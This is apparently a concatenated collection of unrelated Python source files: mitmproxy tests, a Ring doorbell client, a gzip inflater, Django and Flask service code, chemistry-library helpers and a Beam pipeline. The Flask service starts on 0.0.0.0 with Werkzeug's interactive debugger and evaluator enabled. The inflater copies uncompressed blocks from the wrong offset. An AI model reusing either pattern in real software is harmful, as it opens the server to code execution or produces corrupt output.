def test_dump_dicts():
o = options.Options()
assert optmanager.dump_dicts(o)
assert optmanager.dump_dicts(o, ['http2', 'anticomp'])
class TTypes(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("str", str, "str", "help")
self.add_option("optstr", typing.Optional[str], "optstr", "help", "help")
self.add_option("bool", bool, False, "help")
self.add_option("bool_on", bool, True, "help")
self.add_option("int", int, 0, "help")
self.add_option("optint", typing.Optional[int], 0, "help")
self.add_option("seqstr", typing.Sequence[str], [], "help")
self.add_option("unknown", float, 0.0, "help")
def test_make_parser():
parser = argparse.ArgumentParser()
opts = TTypes()
opts.make_parser(parser, "str", short="a")
opts.make_parser(parser, "bool", short="b")
opts.make_parser(parser, "int", short="c")
opts.make_parser(parser, "seqstr", short="d")
opts.make_parser(parser, "bool_on", short="e")
with pytest.raises(ValueError):
opts.make_parser(parser, "unknown")
def test_set():
opts = TTypes()
opts.set("str=foo")
assert opts.str == "foo"
with pytest.raises(TypeError):
opts.set("str")
opts.set("optstr=foo")
assert opts.optstr == "foo"
opts.set("optstr")
assert opts.optstr is None
opts.set("bool=false")
assert opts.bool is False
opts.set("bool")
assert opts.bool is True
opts.set("bool=true")
assert opts.bool is True
with pytest.raises(exceptions.OptionsError):
opts.set("bool=wobble")
opts.set("bool=toggle")
assert opts.bool is False
opts.set("bool=toggle")
assert opts.bool is True
opts.set("int=1")
assert opts.int == 1
with pytest.raises(exceptions.OptionsError):
opts.set("int=wobble")
opts.set("optint")
assert opts.optint is None
assert opts.seqstr == []
opts.set("seqstr=foo")
assert opts.seqstr == ["foo"]
opts.set("seqstr=bar")
assert opts.seqstr == ["foo", "bar"]
opts.set("seqstr")
assert opts.seqstr == []
with pytest.raises(exceptions.OptionsError):
opts.set("nonexistent=wobble")
```
#### File: test/mitmproxy/test_taddons.py
```python
import io
from mitmproxy.test import taddons
from mitmproxy.test import tutils
from mitmproxy import ctx
def test_recordingmaster():
with taddons.context() as tctx:
assert not tctx.master.has_log("nonexistent")
assert not tctx.master.has_event("nonexistent")
ctx.log.error("foo")
assert not tctx.master.has_log("foo", level="debug")
assert tctx.master.has_log("foo", level="error")
def test_dumplog():
with taddons.context() as tctx:
ctx.log.info("testing")
s = io.StringIO()
tctx.master.dump_log(s)
assert s.getvalue()
def test_load_script():
with taddons.context() as tctx:
s = tctx.script(
tutils.test_data.path(
"mitmproxy/data/addonscripts/recorder/recorder.py"
)
)
assert s
```
#### File: 00cool/project-X/updateData.py
```python
import sys
import threading
from threading import Thread
from connect import sendDataToFire
sys.path.append('../')
from renderQuery import queryG, queryY, web
def prepareTOsend():
while True:
sendDataToFire(json.dumps(queryG))
prepareTOsend()
``` |
{
"source": "00Duck/RingSlackPy",
"score": 3
} |
#### File: 00Duck/RingSlackPy/ring_session.py
```python
import json
import getpass
import logging
from uuid import uuid4 as uuid
from ring_doorbell import Ring, Auth
from pathlib import Path
import traceback
class RingSession:
"""
Starts a Ring session. Create a cache file and pass it into this class. On first run, use your user/password/token (I verified from the app)
to log in. Once you have a token, you will re-use the token from the cache file to establish new sessions.
"""
def __init__(self, cache_file):
self.cache_file = cache_file
self.ring = None
logging.basicConfig(format='%(asctime)s\t%(levelname)s\t%(message)s',
datefmt='%Y-%d-%m %H:%M:%S', filename='server.log', level=logging.INFO)
def get_doorbot_by_id(self, id: str):
if self.ring == None:
return
devices = self.ring.devices()
for device in devices['doorbots'] or []:
if str(device.id) == id:
return device
return None
def take_screenshot(self, device_id: str):
if self.ring == None:
return
device = self.get_doorbot_by_id(device_id)
if device != None:
device.get_snapshot(retries=3, delay=2, filename="last_screenshot.jpg")
def get_battery_life(self, device_id: str):
if self.ring == None:
return None
device = self.get_doorbot_by_id(device_id)
if device != None:
return device.battery_life
return None
def hardware_id(self, hwp) -> str:
if hwp.is_file():
return str(hwp.read_text())
else:
uid = str(uuid())
hwp.write_text(uid)
return uid
def token_updater(self, token):
"""Write to the cache file to update with the latest refresh token. Used by the Auth class"""
token['scope'] = "client" # I overwrote this because other API's use "client" instead of ["client"]
self.cache_file.write_text(json.dumps(token))
def create_ring(self):
"""Authenticates your user and returns a Ring instance to be queried further."""
if self.cache_file.is_file():
auth = Auth("android:com.ringapp",
json.loads(self.cache_file.read_text()), self.token_updater, self.hardware_id(Path('hw_id.cache')))
else:
username = input("user: ")
password = <PASSWORD>("password: ")
token = input("2FA code: ")
auth = Auth("android:com.ringapp", None, self.token_updater, self.hardware_id(Path('hw_id.cache')))
try:
auth.fetch_token(username, password, token)
except:
logging.error("Problem fetching token from input authorization.")
quit()
ring = Ring(auth)
if ring.session is None:
try:
ring.create_session()
except:
print(traceback.format_exc())
logging.error("Authorization error - token likely expired.")
quit()
self.ring = ring
``` |
{
"source": "00ff0000red/raw-wasm",
"score": 2
} |
#### File: raw-wasm/inflate/inflate.py
```python
import argparse
import sys
MAXBITS = 15
MAXCLCODES = 19
MAXLCODES = 286
MAXDCODES = 32
FIXLCODES = 288
FIXED_LIT_LENS = [8] * 144 + [9] * 112 + [7] * 24 + [8] * 8
FIXED_DIST_LENS = [5] * 32
CODELEN_LITS = [16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15]
LENGTH_BASE = [3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258]
DIST_BASE = [1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577]
EXTRA_LENGTH_BITS = [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0]
EXTRA_DIST_BITS = [0, 0, 0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12, 12, 13, 13]
class Huffman(object):
def __init__(self, lens, maxsyms):
# build count
self.count = [0] * (MAXBITS+1)
for l in lens:
self.count[l] += 1
# build offset
offs = [0, 0]
for i in range(1, MAXBITS):
offs.append(offs[i] + self.count[i])
# build code -> symbol
self.symbol = [0] * maxsyms
for i, l in enumerate(lens):
if l != 0:
self.symbol[offs[l]] = i
offs[l] += 1
class Inflater(object):
def __init__(self, data):
self.input = data + b'\0\0' # So we can read a little past the end
# gzip header
assert(self.input[0] == 0x1f)
assert(self.input[1] == 0x8b)
assert(self.input[2] == 0x08)
flags = self.input[3]
has_text = (flags & 1) != 0
has_crc16 = (flags & 2) != 0
has_extra = (flags & 4) != 0
has_name = (flags & 8) != 0
has_comment = (flags & 0x10) != 0
assert(not has_text)
assert(not has_crc16)
assert(not has_extra)
assert(not has_comment)
self.bit_idx = 80 # After the header
if has_name:
while self.input[self.bit_idx // 8] != 0:
self.bit_idx += 8
self.bit_idx += 8
self.output = []
def Inflate(self):
while self.ReadBlock():
pass
return self.output
def ReadBits(self, n):
byte_idx = self.bit_idx // 8
bit_idx = self.bit_idx & 7
data = self.input[byte_idx]
data |= self.input[byte_idx + 1] << 8
data |= self.input[byte_idx + 2] << 16
data >>= bit_idx
data &= ((1 << n) - 1)
self.bit_idx += n
# print(f'ReadBits({n}) => {data}')
return data
def ReadBlock(self):
bfinal = self.ReadBits(1)
btype = self.ReadBits(2)
if btype == 0: # uncompressed
self.bit_idx = (self.bit_idx + 7) & ~7 # align
len_ = self.ReadBits(16)
nlen_ = self.ReadBits(16)
self.output.extend(self.input[0:len_])
self.bit_idx += len_ * 8
return not bfinal
elif btype == 1: # fixed huffman
lit_huff = Huffman(FIXED_LIT_LENS, FIXLCODES)
dist_huff = Huffman(FIXED_DIST_LENS, MAXDCODES)
elif btype == 2: # dynamic huffman
hlit = self.ReadBits(5) + 257
hdist = self.ReadBits(5) + 1
hclen = self.ReadBits(4) + 4
lens = [0] * MAXCLCODES
for i in range(hclen):
lens[CODELEN_LITS[i]] = self.ReadBits(3)
codelen_huff = Huffman(lens, MAXCLCODES)
lits_dists = self.ReadCodeLens(codelen_huff, hlit + hdist)
lit_huff = Huffman(lits_dists[:hlit], MAXLCODES)
dist_huff = Huffman(lits_dists[hlit:], MAXDCODES)
else: # reserved
assert(False)
while True:
code = self.ReadCode(lit_huff)
if code < 256:
self.output.append(code)
print(f'>> Output ({repr(chr(code))})')
elif code == 256:
print(f'>> Stop')
break
else:
lextra = self.ReadBits(EXTRA_LENGTH_BITS[code - 257])
length = LENGTH_BASE[code - 257] + lextra
dcode = self.ReadCode(dist_huff)
dextra = self.ReadBits(EXTRA_DIST_BITS[dcode])
dist = DIST_BASE[dcode] + dextra
for i in range(length):
self.output.append(self.output[-dist])
print(f">> Ref ({dist}, {length}) = {repr(''.join(map(chr, self.output[-length:])))}")
return not bfinal
def ReadCode(self, huffman):
code = 0
first = 0
index = 0
for i in range(1, MAXBITS+1):
code |= self.ReadBits(1)
count = huffman.count[i]
if code - count < first:
sym = huffman.symbol[index + (code - first)]
# print(f'ReadCode() => {sym} ({repr(chr(sym))})')
return sym
index += count
first += count
first <<= 1
code <<= 1
raise Exception('Unknown code!')
def ReadCodeLens(self, huffman, count):
res = []
while len(res) < count:
x = self.ReadCode(huffman)
if x < 16:
res.append(x)
continue
elif x == 16:
rep_val = res[-1]
rep_cnt = 3 + self.ReadBits(2)
elif x == 17:
rep_val = 0
rep_cnt = 3 + self.ReadBits(3)
elif x == 18:
rep_val = 0
rep_cnt = 11 + self.ReadBits(7)
res += [rep_val] * rep_cnt
return res
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args(args)
inflater = Inflater(open(args.file, 'rb').read())
output = ''.join(map(chr, inflater.Inflate()))
# print('output', output)
# print('len', len(output))
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
``` |
{
"source": "00FFEF/Team_Project",
"score": 2
} |
#### File: Team_Project/home/views.py
```python
import json
from django.shortcuts import render
from django.http import HttpResponse
from templates.MyAnalysis import MyAnalysis
import sqlite3
import pandas as pd
import sqlite3
# Create your views here.
def main(request):
return render(request, 'index.html')
def scrapping_index(request):
return render(request,'scrapping_index.html')
def machine_index(request):
result = dict()
conn = sqlite3.connect('db.sqlite3')
conn.row_factory = sqlite3.Row # for getting columns
curs = conn.cursor()
curs.execute('select * from dbapp_admachine da')
data = curs.fetchall()
for row in data:
print(row['Age'])
print(row['EstimatedSalary'])
print(row['Gender'])
print(row['Purchased'])
print(row['UserID'])
print(row['id'])
result['erows'] = data
return render(request,'machine_index.html',result)
def service_index(request):
return render(request,'service_index.html')
def kakao_chart(request):
data = MyAnalysis().kakaoo()
return HttpResponse(json.dumps(data), content_type='application/json')
def naver_chart(request):
data = MyAnalysis().never()
return HttpResponse(json.dumps(data), content_type='application/json')
def ad(request):
conn = sqlite3.connect("../db.sqlite3")
df = pd.read_sql_query('select * from dbapp_admachine da', conn)
age = df['Age']
sal = df['EstimatedSalary']
gen = df['Gender']
pur = df['Purchased']
uid = df['UserID']
result = {'Age' : age, 'Estimated Salary' : sal, 'Gender' : gen, 'Purchased' : pur, 'User ID' : uid}
return render(request, 'machine_index.html', context=result)
``` |
{
"source": "00Green27/Indigo",
"score": 2
} |
#### File: bingo_elastic/model/helpers.py
```python
from pathlib import Path
from typing import Callable, Generator, Optional, Union
from indigo import Indigo, IndigoObject
from bingo_elastic.model.record import IndigoRecord
def iterate_file(
file: Path,
iterator: str = None,
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator[IndigoRecord, None, None]:
"""
:param file:
:param iterator: supported iterators sdf, smiles, smi, cml.
If iterator is not set, trying to determine
iterator by file extension
:type iterator: str
:param error_handler: lambda for catching exceptions
:type error_handler: Optional[Callable[[object, BaseException], None]]
:return:
"""
iterators = {
"sdf": "iterateSDFile",
"smiles": "iterateSmilesFile",
"smi": "iterateSmilesFile",
"cml": "iterateCMLFile",
}
if not iterator:
iterator = file.suffix[1:]
iterator_fn = iterators.get(iterator)
if not iterator_fn:
raise AttributeError(f"Unsupported iterator {iterator}")
indigo_object: IndigoObject
for indigo_object in getattr(Indigo(), iterator_fn)(str(file)):
yield IndigoRecord(
indigo_object=indigo_object, error_handler=error_handler
)
def iterate_sdf(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"sdf",
error_handler=error_handler,
)
def iterate_smiles(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"smiles",
error_handler=error_handler,
)
def iterate_cml(
file: Union[Path, str],
error_handler: Optional[Callable[[object, BaseException], None]] = None,
) -> Generator:
yield from iterate_file(
Path(file) if isinstance(file, str) else file,
"cml",
error_handler=error_handler,
)
```
#### File: tests/model/test_helpers.py
```python
from pathlib import Path
from typing import Callable
import bingo_elastic.model.helpers as helpers
def test_iterate_sdf(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
sdf = helpers.iterate_sdf(
resource_loader("resources/rand_queries_small.sdf")
)
else:
sdf = helpers.iterate_file(
Path(resource_loader("resources/rand_queries_small.sdf"))
)
i = 0
for i, _ in enumerate(sdf, start=1):
pass
results.append(i)
assert results[0] == results[1]
def test_iterate_smiles(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
smiles = helpers.iterate_smiles(
resource_loader("resources/pubchem_slice_50.smi")
)
else:
smiles = helpers.iterate_file(
Path(resource_loader("resources/pubchem_slice_50.smi"))
)
i = 0
for i, _ in enumerate(smiles, start=1):
pass
results.append(i)
assert results[0] == results[1]
def test_iterate_cml(resource_loader: Callable[[str], str]):
results = []
for step in range(0, 2):
if 0 == step:
cml = helpers.iterate_cml(
resource_loader("resources/tetrahedral-all.cml")
)
else:
cml = helpers.iterate_file(
Path(resource_loader("resources/tetrahedral-all.cml"))
)
i = 0
for i, _ in enumerate(cml, start=1):
pass
results.append(i)
assert results[0] == results[1]
```
#### File: python/common/indigo_coverage.py
```python
import sys
import os
from inspect import getmembers
from types import BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType
import zipfile
from util import isIronPython, isJython, getPlatform
cur_path = os.path.abspath(os.path.dirname(__file__))
distPaths = [os.path.join(cur_path, '../../../indigo/dist'), os.path.join(cur_path, '../../dist/')]
success = False
if isIronPython():
raise RuntimeError("Indigo coverage is not supported in .NET")
elif isJython():
raise RuntimeError("Indigo coverage is not supported in Java")
else:
dll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/python"))
rdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/renderer/python"))
idll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/inchi/python"))
bdll_full_path = os.path.normpath(os.path.join(cur_path, "../../../indigo/api/plugins/bingo/python"))
if not os.path.exists(os.path.join(dll_full_path, 'lib')):
for distPath in distPaths:
if not os.path.exists(distPath):
continue
dll_full_path = '%s/python' % (distPath)
for item in os.listdir(distPath):
if item.startswith('indigo-python-') and item.endswith('.zip') and (item.find(getPlatform()) != -1 or item.find('universal') != -1):
curdir = os.path.abspath(os.curdir)
os.chdir(distPath)
if 'INDIGO_TEST_MODE' not in os.environ:
with zipfile.ZipFile(item) as zf:
zf.extractall()
os.environ['INDIGO_TEST_MODE'] = '1'
os.chdir(curdir)
dll_full_path = os.path.abspath(os.path.join(cur_path, distPath, item.replace('.zip', '')))
break
if not os.path.exists(dll_full_path):
continue
break
sys.path.insert(0, dll_full_path)
sys.path.insert(0, rdll_full_path)
sys.path.insert(0, idll_full_path)
sys.path.insert(0, bdll_full_path)
from indigo import Indigo, IndigoObject, IndigoException
from indigo_renderer import IndigoRenderer
from indigo_inchi import IndigoInchi
from bingo import Bingo, BingoException, BingoObject
success = True
if not success:
raise RuntimeError('Indigo not found at %s' % distPaths)
class IndigoObjectCoverageWrapper(IndigoObject):
def __init__(self, dispatcher, id, parent=None):
IndigoObject.__init__(self, dispatcher, id, parent)
self._type = None
self._type = int(self.dbgInternalType()[1:3])
def __getattribute__(self, item):
dispatcher = object.__getattribute__(self, 'dispatcher')
type = object.__getattribute__(self, '_type')
if dispatcher is not None:
if item in dispatcher._indigoObjectCoverageDict:
dispatcher._indigoObjectCoverageDict[item] += 1
if type:
if type not in dispatcher._indigoObjectCoverageByTypeDict:
dispatcher._indigoObjectCoverageByTypeDict[type] = {}
dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1
else:
if item not in dispatcher._indigoObjectCoverageByTypeDict[type]:
dispatcher._indigoObjectCoverageByTypeDict[type][item] = 1
else:
dispatcher._indigoObjectCoverageByTypeDict[type][item] += 1
return object.__getattribute__(self, item)
class IndigoCoverageWrapper(Indigo):
def __init__(self, path=None):
Indigo.__init__(self, path)
if isJython() or isIronPython():
IndigoObject = IndigoObjectCoverageWrapper
# TODO: Change standard IndigoObject to IndigoObjectCoverageWrapper
else:
self.IndigoObject = IndigoObjectCoverageWrapper
self._indigoObjectCoverageDict = dict()
self._indigoObjectCoverageByTypeDict = dict()
m = self.createMolecule()
for item in getmembers(m):
if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'):
self._indigoObjectCoverageDict[item[0]] = 0
self._indigoCoverageDict = dict()
for item in getmembers(self):
if type(item[1]) in (BuiltinFunctionType, BuiltinMethodType, MethodType, FunctionType) and not item[0].startswith('_'):
self._indigoCoverageDict[item[0]] = 0
def __getattribute__(self, item):
try:
indigoCoverageDict = object.__getattribute__(self, '_indigoCoverageDict')
if indigoCoverageDict:
if item in indigoCoverageDict:
indigoCoverageDict[item] += 1
except AttributeError:
pass
return object.__getattribute__(self, item)
def version(self):
return super(IndigoCoverageWrapper, self).version() + '-coverage'
class IndigoObjectTypeEnum:
SCANNER = 1
MOLECULE = 2
QUERY_MOLECULE = 3
REACTION = 4
QUERY_REACTION = 5
OUTPUT = 6
REACTION_ITER = 7
REACTION_MOLECULE = 8
GROSS = 9
SDF_LOADER = 10
SDF_SAVER = 11
RDF_MOLECULE = 12
RDF_REACTION = 13
RDF_LOADER = 14
SMILES_MOLECULE = 15
SMILES_REACTION = 16
MULTILINE_SMILES_LOADER = 17
ATOM = 18
ATOMS_ITER = 19
RGROUP = 20
RGROUPS_ITER = 21
RGROUP_FRAGMENT = 22
RGROUP_FRAGMENTS_ITER = 23
ARRAY = 24
ARRAY_ITER = 25
ARRAY_ELEMENT = 26
MOLECULE_SUBSTRUCTURE_MATCH_ITER = 27
MOLECULE_SUBSTRUCTURE_MATCHER = 28
REACTION_SUBSTRUCTURE_MATCHER = 29
SCAFFOLD = 30
DECONVOLUTION = 31
DECONVOLUTION_ELEM = 32
DECONVOLUTION_ITER = 33
PROPERTIES_ITER = 34
PROPERTY = 35
FINGERPRINT = 36
BOND = 37
BONDS_ITER = 38
ATOM_NEIGHBOR = 39
ATOM_NEIGHBORS_ITER = 40
SUPERATOM = 41
SUPERATOMS_ITER = 42
DATA_SGROUP = 43
DATA_SGROUPS_ITER = 44
REPEATING_UNIT = 45
REPEATING_UNITS_ITER = 46
MULTIPLE_GROUP = 47
MULTIPLE_GROUPS_ITER = 48
GENERIC_SGROUP = 49
GENERIC_SGROUPS_ITER = 50
SGROUP_ATOMS_ITER = 51
SGROUP_BONDS_ITER = 52
DECOMPOSITION = 53
COMPONENT = 54
COMPONENTS_ITER = 55
COMPONENT_ATOMS_ITER = 56
COMPONENT_BONDS_ITER = 57
SUBMOLECULE = 58
SUBMOLECULE_ATOMS_ITER = 59
SUBMOLECULE_BONDS_ITER = 60
MAPPING = 61
REACTION_MAPPING = 62
SSSR_ITER = 63
SUBTREES_ITER = 64
RINGS_ITER = 65
EDGE_SUBMOLECULE_ITER = 66
CML_MOLECULE = 67
CML_REACTION = 68
MULTIPLE_CML_LOADER = 69
SAVER = 70
ATTACHMENT_POINTS_ITER = 71
DECOMPOSITION_MATCH = 72
DECOMPOSITION_MATCH_ITER = 73
TAUTOMER_ITER = 74
TAUTOMER_MOLECULE = 75
IndigoObjectTypeDict = {
1: 'SCANNER',
2: 'MOLECULE',
3: 'QUERY_MOLECULE',
4: 'REACTION',
5: 'QUERY_REACTION',
6: 'OUTPUT',
7: 'REACTION_ITER',
8: 'REACTION_MOLECULE',
9: 'GROSS',
10: 'SDF_LOADER',
11: 'SDF_SAVER',
12: 'RDF_MOLECULE',
13: 'RDF_REACTION',
14: 'RDF_LOADER',
15: 'SMILES_MOLECULE',
16: 'SMILES_REACTION',
17: 'MULTILINE_SMILES_LOADER',
18: 'ATOM',
19: 'ATOMS_ITER',
20: 'RGROUP',
21: 'RGROUPS_ITER',
22: 'RGROUP_FRAGMENT',
23: 'RGROUP_FRAGMENTS_ITER',
24: 'ARRAY',
25: 'ARRAY_ITER',
26: 'ARRAY_ELEMENT',
27: 'MOLECULE_SUBSTRUCTURE_MATCH_ITER',
28: 'MOLECULE_SUBSTRUCTURE_MATCHER',
29: 'REACTION_SUBSTRUCTURE_MATCHER',
30: 'SCAFFOLD',
31: 'DECONVOLUTION',
32: 'DECONVOLUTION_ELEM',
33: 'DECONVOLUTION_ITER',
34: 'PROPERTIES_ITER',
35: 'PROPERTY',
36: 'FINGERPRINT',
37: 'BOND',
38: 'BONDS_ITER',
39: 'ATOM_NEIGHBOR',
40: 'ATOM_NEIGHBORS_ITER',
41: 'SUPERATOM',
42: 'SUPERATOMS_ITER',
43: 'DATA_SGROUP',
44: 'DATA_SGROUPS_ITER',
45: 'REPEATING_UNIT',
46: 'REPEATING_UNITS_ITER',
47: 'MULTIPLE_GROUP',
48: 'MULTIPLE_GROUPS_ITER',
49: 'GENERIC_SGROUP',
50: 'GENERIC_SGROUPS_ITER',
51: 'SGROUP_ATOMS_ITER',
52: 'SGROUP_BONDS_ITER',
53: 'DECOMPOSITION',
54: 'COMPONENT',
55: 'COMPONENTS_ITER',
56: 'COMPONENT_ATOMS_ITER',
57: 'COMPONENT_BONDS_ITER',
58: 'SUBMOLECULE',
59: 'SUBMOLECULE_ATOMS_ITER',
60: 'SUBMOLECULE_BONDS_ITER',
61: 'MAPPING',
62: 'REACTION_MAPPING',
63: 'SSSR_ITER',
64: 'SUBTREES_ITER',
65: 'RINGS_ITER',
66: 'EDGE_SUBMOLECULE_ITER',
67: 'CML_MOLECULE',
68: 'CML_REACTION',
69: 'MULTIPLE_CML_LOADER',
70: 'SAVER',
71: 'ATTACHMENT_POINTS_ITER',
72: 'DECOMPOSITION_MATCH',
73: 'DECOMPOSITION_MATCH_ITER',
74: 'TAUTOMER_ITER',
75: 'TAUTOMER_MOLECULE',
}
```
#### File: python/common/thread_printer.py
```python
from __future__ import with_statement
import sys
if sys.version_info < (3, 0):
from cStringIO import StringIO
else:
from io import StringIO
import inspect
import os
class ThreadPrinter(object):
def __init__(self, lock):
self.fhs = {}
self.lock = lock
def write(self, value):
with self.lock:
frm = inspect.stack()[1][1]
splittedFromPath = frm.split(os.path.sep)
test_group = splittedFromPath[-2]
test = splittedFromPath[-1]
curTestName = '%s/%s' % (test_group, test)
if curTestName in self.fhs:
f = self.fhs[curTestName]
else:
f = StringIO()
f.write(value)
self.fhs[curTestName] = f
def getValueByTestName(self, testName):
result = ''
for key, value in self.fhs.items():
key = key.replace('_modified', '')
if key == testName:
result = value.getvalue()
return result
```
#### File: indigo-service/service/app.py
```python
import logging
import sys
from flask import Flask, jsonify, Blueprint
from flasgger import Swagger
from optparse import OptionParser
from werkzeug.serving import run_simple
from v2.libraries_api import libraries_api
from v2.indigo_api import indigo_api, indigo_init
from v2.db.database import db_session
from v2.imago_api import imago_api
from v2.common_api import common_api
def is_indigo_db():
try:
import socket
socket.gethostbyname('indigo_db')
return True
except:
return False
app = Flask(__name__)
app.config.from_pyfile('config.py')
if is_indigo_db():
app.register_blueprint(libraries_api, url_prefix='/v2/libraries')
app.register_blueprint(indigo_api, url_prefix='/v2/indigo')
app.register_blueprint(imago_api, url_prefix='/v2/imago')
app.register_blueprint(common_api,url_prefix='/v2')
Swagger(app)
# logging.basicConfig(, level=logging.INFO)
logging.basicConfig(stream=sys.stdout, format = u'[%(asctime)s: %(levelname)-8s/%(filename)s:%(lineno)d] %(message)s', level = app.config.get('LOG_LEVEL'))
def run_server(port):
run_simple('0.0.0.0', port, app, use_reloader=True, use_debugger=True, use_evalex=True)
@app.teardown_appcontext
def shutdown_session(exception=None):
db_session.remove()
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-s", "--server", action="store_true", dest="run_server", default=False, help="Run local server")
parser.add_option("-p", "--port", action="store", dest="port", type="int", default=5000, help="Specify port")
(options, args) = parser.parse_args()
if options.run_server:
run_server(options.port)
``` |
{
"source": "00inboxtest/cloud-foundation-fabric",
"score": 3
} |
#### File: scripts/data_ingestion/data_ingestion.py
```python
import argparse
import logging
import re
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
class DataIngestion:
"""A helper class which contains the logic to translate the file into
a format BigQuery will accept."""
def parse_method(self, string_input):
"""Translate CSV row to dictionary.
Args:
string_input: A comma separated list of values in the form of
name,surname
Example string_input: lorenzo,caggioni
Returns:
A dict mapping BigQuery column names as keys
example output:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
}
"""
# Strip out carriage return, newline and quote characters.
values = re.split(",", re.sub('\r\n', '', re.sub('"', '',
string_input)))
row = dict(
zip(('name', 'surname', 'age'),
values))
return row
class InjectTimestamp(beam.DoFn):
"""A class which add a timestamp for each row.
Args:
element: A dictionary mapping BigQuery column names
Example:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
}
Returns:
The input dictionary with a timestamp value added
Example:
{
'name': 'mario',
'surname': 'rossi',
'age': 30
'_TIMESTAMP': 1545730073
}
"""
def process(self, element):
import time
element['_TIMESTAMP'] = int(time.mktime(time.gmtime()))
return [element]
def run(argv=None):
"""The main function which creates the pipeline and runs it."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--input',
dest='input',
required=False,
help='Input file to read. This can be a local file or '
'a file in a Google Storage Bucket.')
parser.add_argument(
'--output',
dest='output',
required=False,
help='Output BQ table to write results to.')
# Parse arguments from the command line.
known_args, pipeline_args = parser.parse_known_args(argv)
# DataIngestion is a class we built in this script to hold the logic for
# transforming the file into a BigQuery table.
data_ingestion = DataIngestion()
# Initiate the pipeline using the pipeline arguments
p = beam.Pipeline(options=PipelineOptions(pipeline_args))
(p
# Read the file. This is the source of the pipeline.
| 'Read from a File' >> beam.io.ReadFromText(known_args.input)
# Translates CSV row to a dictionary object consumable by BigQuery.
| 'String To BigQuery Row' >>
beam.Map(lambda s: data_ingestion.parse_method(s))
# Add the timestamp on each row
| 'Inject Timestamp - ' >> beam.ParDo(InjectTimestamp())
# Write data to Bigquery
| 'Write to BigQuery' >> beam.io.Write(
beam.io.BigQuerySink(
# BigQuery table name.
known_args.output,
# Bigquery table schema
schema='name:STRING,surname:STRING,age:NUMERIC,_TIMESTAMP:TIMESTAMP',
# Creates the table in BigQuery if it does not yet exist.
create_disposition=beam.io.BigQueryDisposition.CREATE_NEVER,
# Deletes all data in the BigQuery table before writing.
write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE)))
p.run().wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
```
#### File: modules/compute_mig/test_plan.py
```python
import os
import pytest
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixture')
def test_defaults(plan_runner):
"Test variable defaults."
_, resources = plan_runner(FIXTURES_DIR)
assert len(resources) == 1
print(resources[0]['type'])
mig = resources[0]
assert mig['type'] == 'google_compute_instance_group_manager'
assert mig['values']['target_size'] == 2
assert mig['values']['zone']
_, resources = plan_runner(FIXTURES_DIR, regional='true')
assert len(resources) == 1
mig = resources[0]
assert mig['type'] == 'google_compute_region_instance_group_manager'
assert mig['values']['target_size'] == 2
assert mig['values']['region']
def test_health_check(plan_runner):
"Test health check resource."
health_check_config = '{type="tcp", check={port=80}, config=null, logging=false}'
_, resources = plan_runner(
FIXTURES_DIR, health_check_config=health_check_config)
assert len(resources) == 2
assert any(r['type'] == 'google_compute_health_check' for r in resources)
def test_autoscaler(plan_runner):
"Test autoscaler resource."
autoscaler_config = (
'{'
'max_replicas=3, min_replicas=1, cooldown_period=60,'
'cpu_utilization_target=65, load_balancing_utilization_target=null,'
'metric=null'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, autoscaler_config=autoscaler_config)
assert len(resources) == 2
autoscaler = resources[0]
assert autoscaler['type'] == 'google_compute_autoscaler'
assert autoscaler['values']['autoscaling_policy'] == [{
'cooldown_period': 60,
'cpu_utilization': [{'predictive_method': 'NONE', 'target': 65}],
'load_balancing_utilization': [],
'max_replicas': 3,
'metric': [],
'min_replicas': 1,
'mode': 'ON',
'scale_in_control': [],
'scaling_schedules': [],
}]
_, resources = plan_runner(
FIXTURES_DIR, autoscaler_config=autoscaler_config, regional='true')
assert len(resources) == 2
autoscaler = resources[0]
assert autoscaler['type'] == 'google_compute_region_autoscaler'
def test_stateful_mig(plan_runner):
"Test stateful instances - mig."
stateful_config = (
'{'
'per_instance_config = {},'
'mig_config = {'
'stateful_disks = {'
'persistent-disk-1 = {delete_rule="NEVER"}'
'}'
'}'
'}'
)
_, resources = plan_runner(
FIXTURES_DIR, stateful_config=stateful_config)
assert len(resources) == 1
statefuldisk = resources[0]
assert statefuldisk['type'] == 'google_compute_instance_group_manager'
assert statefuldisk['values']['stateful_disk'] == [{
'device_name': 'persistent-disk-1',
'delete_rule': 'NEVER',
}]
